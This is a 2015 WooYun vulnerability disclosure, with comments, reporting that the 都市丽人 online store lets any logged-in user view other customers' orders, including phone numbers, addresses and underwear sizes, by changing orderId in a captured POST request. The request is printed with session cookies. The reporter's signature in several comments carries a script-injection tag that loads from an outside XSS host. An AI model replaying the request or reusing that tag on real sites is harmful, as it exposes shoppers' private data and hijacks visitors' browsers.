当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124423

漏洞标题:都市丽人官方商城可查看别人订单详情(手机,收货地址)

相关厂商:都市丽人官方商城

漏洞作者: 碎片

提交时间:2015-07-04 10:56

修复时间:2015-08-18 10:58

公开时间:2015-08-18 10:58

漏洞类型:内容安全

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

简单粗暴越权,目测可以看到整个订单,包括妹子的内衣大小
弱弱的问一下,我wooyun的注册邮箱过期了,能不能帮忙改个邮箱

详细说明:

POST /webapp/wcs/stores/servlet/OrderDetailsCmd HTTP/1.1
Host: www.dslrpark.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.dslrpark.com/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&position=1&langId=-7&storeId=10001
Content-Length: 57
Cookie: WPTLNG=1; _adwr=60408235%23http%253A%252F%252Fbzclk.baidu.com%252Fadrc.php%253Ft%253D0fKL00c00fDpow00ylK70jOzU00hdGPN00000n382am00000ILCmQo.THvvEnofs5UczsK85ydEUhkGUhNxP7qbusK15yc4nvDYm1wBnj0snHubn1T0IHdKn1F7nH0LnRc3n1f1nHFDwbPDnWF7nbcvnjfkf1T1w6K95gTqFhdWpyfqnHfLnWT3n16LPzusThqbpyfqnHmhULFG5HDhTLNBULFG5iusThbqn6K-5y9YIZ0lQzqLILT8uZP_TMK9Th_8mvqVQsKWThnqPWRsnHf%2526ie%253Dutf-8%2526f%253D8%2526tn%253Dmonline_4_dg%2526wd%253D%2525E9%252583%2525BD%2525E5%2525B8%252582%2525E4%2525B8%2525BD%2525E4%2525BA%2525BA; Hm_lvt_d63bf9604067cbdd86c4a4ddba0a79b0=1435151189,1435751978; CoreID6=36131358438014329072173&ci=90408287_60408287; JSESSIONID=0000ao6APxVI9DoO_YrSSMSQETN:18eiqe3dv; REFERRER=http%3a%2f%2fbzclk%2ebaidu%2ecom%2fadrc%2ephp%3ft%3d0fKL00c00fDpow00ylK70jOzU00hdGPN00000n382am00000ILCmQo%2eTHvvEnofs5UczsK85ydEUhkGUhNxP7qbusK15yc4nvDYm1wBnj0snHubn1T0IHdKn1F7nH0LnRc3n1f1nHFDwbPDnWF7nbcvnjfkf1T1w6K95gTqFhdWpyfqnHfLnWT3n16LPzusThqbpyfqnHmhULFG5HDhTLNBULFG5iusThbqn6K%2d5y9YIZ0lQzqLILT8uZP%5fTMK9Th%5f8mvqVQsKWThnqPWRsnHf%26ie%3dutf%2d8%26f%3d8%26tn%3dmonline%5f4%5fdg%26wd%3d%25E9%2583%25BD%25E5%25B8%2582%25E4%25B8%25BD%25E4%25BA%25BA; WC_PERSISTENT=al0N8fFFvWd7TId7%2fDLfcwt4wUs%3d%0a%3b2015%2d07%2d01+20%3a01%3a48%2e636%5f1432909525142%2d12%5f10001; cloud=true; _adwb=60408235; _adwc=60408235; _adwp=60408235.9546262271.1432907217.1435154365.1435751978.5; Hm_lpvt_d63bf9604067cbdd86c4a4ddba0a79b0=1435752145; cmTPSet=Y; 90408287_clogin=l=1435751978&v=1&e=1435754141276; alreadyLoaded=true; SLnewses=1; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d7%2c10001; 60408287_clogin=l=1435752010&v=1&e=1435753927628; WC_AUTHENTICATION_12197614=12197614%2cqD0bBWfnOAGfNxP7Vt6Mwa4YiiI%3d; WC_USERACTIVITY_12197614=12197614%2c10001%2c0%2cnull%2c1435752108647%2c1435754102692%2cnull%2cnull%2cnull%2cnull%2coYOLplIpbICbqJOU1LHTSdH62JUNmBiC9hxoklQRgr8XbbK3QnAeMwuVxA%2bBsIFbPRFTVunsWoew%0alvlEBBUCEd6ZBs3UDI4p0dyDsYbMVIkoie%2bL7G%2bu1s%2fCUrBkWA87Fy%2bVm84nBioYogka%2bI4QKrjQ%0aF0m3gogwcrqxKwKsq6Q%3d; _adwo=60408235.1.900740891
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
orderId=900740537&storeId=10001&catalogId=10001&langId=-7


修改orderId=

漏洞证明:

1.png

E5C89FD0-7D21-4326-9314-9141236144C7.png

2.png

3.png

修复方案:

控制权限

版权声明:转载请注明来源 碎片@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2015-07-04 20:53 | 碎片 ( 路人 | Rank:23 漏洞数:9 | <script src=http://www.xss8.net/?c=MjMf4...)

    @乌云小秘书 我手机号码没打马赛克,能不能帮忙改一下图?

  2. 2015-07-05 08:09 | 乌云小秘书 认证白帽子 ( 普通白帽子 | 还没有发布任何漏洞 | 第1!绝对不意气用事!第2!绝对不漏判任何一...)

    @碎片 好哒

  3. 2015-07-05 10:33 | 碎片 ( 路人 | Rank:23 漏洞数:9 | <script src=http://www.xss8.net/?c=MjMf4...)

    @乌云小秘书 图一和图二,我的手机号码,尚未实名认证底下的那串手机号码,麻烦打码谢谢

  4. 2015-07-06 14:16 | 碎片 ( 路人 | Rank:23 漏洞数:9 | <script src=http://www.xss8.net/?c=MjMf4...)

    @乌云小秘书 帮忙打一下码 图一和图二的手机号码

  5. 2015-07-12 20:38 | 小贱 ( 路人 | Rank:5 漏洞数:2 | 我是一只小菜鸟啊 飞呀飞呀飞)

    @碎片 我草 我买的内衣 你都看见了。。 多羞羞啊

  6. 2015-07-15 15:25 | 乌云小秘书 认证白帽子 ( 普通白帽子 | 还没有发布任何漏洞 | 第1!绝对不意气用事!第2!绝对不漏判任何一...)

    @碎片 好了